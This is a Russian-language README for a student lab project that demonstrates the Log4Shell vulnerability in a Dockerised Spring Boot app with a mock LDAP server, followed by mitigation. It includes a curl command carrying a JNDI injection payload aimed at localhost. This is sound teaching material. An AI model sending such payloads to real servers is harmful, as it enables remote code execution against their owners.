
Демонстрация эксплуатации уязвимости Log4Shell (CVE-2021-44228) для SEAS 8405. Включает уязвимое приложение Spring Boot, поддельный LDAP-сервер, настройку Docker, карту MITRE, реагирование на инциденты и полную запись экрана.
Этот проект демонстрирует эксплуатацию и устранение уязвимости Log4Shell (CVE-2021-44228) с использованием Docker-контейнера Java-веб-приложения с уязвимой версией Log4j 2.14.1. В настройки также включён симулированный вредоносный LDAP-сервер для демонстрации вектора атаки через JNDI-инъекцию.
После эксплуатации система укрепляется путём обновления Log4j, валидации входных данных и применения рекомендаций MITRE D3FEND и ATT&CK.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
Приложение будет доступно по адресу:
http://localhost:8080
python3 ldap_server.py
Отправьте такой запрос к приложению:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
LDAP-сервер должен получить запрос (это имитирует JNDI-эксплойт).
После демонстрации атаки система была защищена путём:
${jndi:...})Смотрите mitigation_report.pdf для:
Если видео не загружено напрямую, оно доступно по ссылке в отчёте.
Serpil Rivas
SEAS 8405 – Cybersecurity Architectures
Май 2025